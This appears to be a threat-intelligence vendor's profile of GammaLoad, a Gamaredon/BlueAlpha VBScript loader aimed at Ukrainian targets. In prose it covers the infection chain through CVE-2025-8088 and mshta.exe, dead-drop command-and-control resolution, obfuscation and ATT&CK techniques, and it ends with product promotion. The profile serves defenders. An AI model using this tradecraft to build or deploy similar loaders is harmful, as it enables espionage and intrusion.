GammaLoad
GammaLoad is a Gamaredon/BlueAlpha-associated staging and loader malware family, most commonly described in recent reporting as an intermediate VBScript downloader within the group’s modular “Gamma” ecosystem. It is used after initial access to fingerprint infected hosts, update registry-based network configuration via dead-drop resolvers, and retrieve and execute arbitrary VBScript payloads from command-and-control infrastructure. Reporting describes GammaLoad as operating through multiple VBScript loaders in a four-stage cascade. It has been observed delivering additional Gamaredon malware including GammaWorm, a worm-like propagation component, and GammaSteel, a modular information stealer; some reporting also notes potential delivery of GammaWipe/GamaWiper.
High-confidence infection chains in the provided content link GammaLoad to Gamaredon campaigns targeting Ukrainian entities, especially government, military, and critical infrastructure organizations. In the 2025-2026 activity documented by Sekoia, initial access used weaponized XHTML spearphishing lures and a malicious RAR archive exploiting WinRAR path traversal vulnerability CVE-2025-8088. The archive dropped an HTA file into the Windows Startup folder, which executed via mshta.exe and fetched GammaLoad from a remote URL. The broader ecosystem used layered dead-drop and C2 resolution through services including Telegram, Telegra.ph, graph.org, Teletype, and Cloudflare Workers. Separate reporting in the content states that since at least October 2023, BlueAlpha has delivered custom VBScript GammaLoad for data exfiltration, credential theft, and persistent access, and that GammaDrop may write GammaLoad to disk and establish persistence. Older 2022 reporting in the content also refers to GammaLoad as a PowerShell info-stealer used by Gamaredon against Ukrainian entities. Overall, the content consistently places GammaLoad in Russia-linked Gamaredon/BlueAlpha espionage operations focused on Ukraine.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
According to Sekoia, the attack consists of exploiting the bug CVE-2025-8088, a path traversal bug in WinRAR, to run an HTML App payload called GammaPhish, which is later used to get a VBScript payload from the C2 server.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
That URL fetches GammaLoad, the intermediate staging layer... “GammaLoad (Staging): We recovered multiple VBScript loaders from the compromised hosts. It seems that these loaders operate in a continuous cascade, with four distinct execution stages observed during our analysis.”
Since at least October 2023 BlueAlpha has delivered the custom VBScript malware GammaLoad, enabling data exfiltration, credential theft, and persistent access to compromised networks.
Since at least October 2023 BlueAlpha has delivered the custom VBScript malware GammaLoad, enabling data exfiltration, credential theft, and persistent access to compromised networks.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesThe attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents of mimicking Ukrainian institutions to target government entities.
Execution
5 techniquesresulting in the execution of arbitrary code retrieved from a command-and-control (C2) server
Following the downloading of the XML file onto victim networks, the attackers executed a PowerShell stealer.
We recovered multiple VBScript loaders from the compromised hosts. It seems that these loaders operate in a continuous cascade, with four distinct execution stages observed during our analysis.
Then the attackers used mshta.exe to download an XML file, which was likely masquerading as an HTML application file.
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Persistence
1 techniqueStealth
3 techniquesBlueAlpha uses obfuscation techniques, namely extensive amounts of junk code and random variable names to complicate analysis.
Then the attackers used mshta.exe to download an XML file, which was likely masquerading as an HTML application file.
Upon execution, the HTA file leverages mshta.exe to call a remote payload hosted on a C2 server.
Defense Impairment
1 techniqueCredential Access
1 techniqueSince at least October 2023 BlueAlpha has delivered the custom VBScript malware GammaLoad, enabling data exfiltration, credential theft, and persistent access to compromised networks.
Discovery
1 techniqueTheir primary objectives are to fingerprint the host system, update the network configuration in the registry using Dead Drop Resolvers (DDRs), fetch and execute arbitrary VBScript payloads from the C2 servers.
Command and Control
5 techniquesGammaLoad: a custom loader capable of beaconing to its C2 and executing additional malware
Their primary objectives are to fingerprint the host system, update the network configuration in the registry using Dead Drop Resolvers (DDRs), fetch and execute arbitrary VBScript payloads from the C2 servers.
Their primary objectives are to fingerprint the host system, update the network configuration in the registry using Dead Drop Resolvers (DDRs), fetch and execute arbitrary VBScript payloads from the C2 servers.
If the C2 returns HTTP 200, it executes arbitrary VBScript from the response body.
DNS fast-fluxing complicates efforts to track and disrupt command-and-control (C2) communications.
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Other indicator types observed in public reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Intermediate staging layer composed of VBScript loaders that fingerprint the host, update network configuration in the registry using dead drop resolvers, and fetch and execute arbitrary VBScript payloads from C2 servers.
A loader in the infection chain that is likely deployed by GammaPhish and used to deliver other Gamaredon malware families such as GammaSteel, and possibly GammaWorm or GammaWipe.
An intermediate VBScript downloader in the Gamaredon infection chain that fingerprints the host, updates network configuration in the registry using dead drop resolvers, and fetches and executes arbitrary VBScript payloads from C2 servers.
A staging or loader component in Gamaredon's Gamma ecosystem used as part of the modular intrusion chain.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.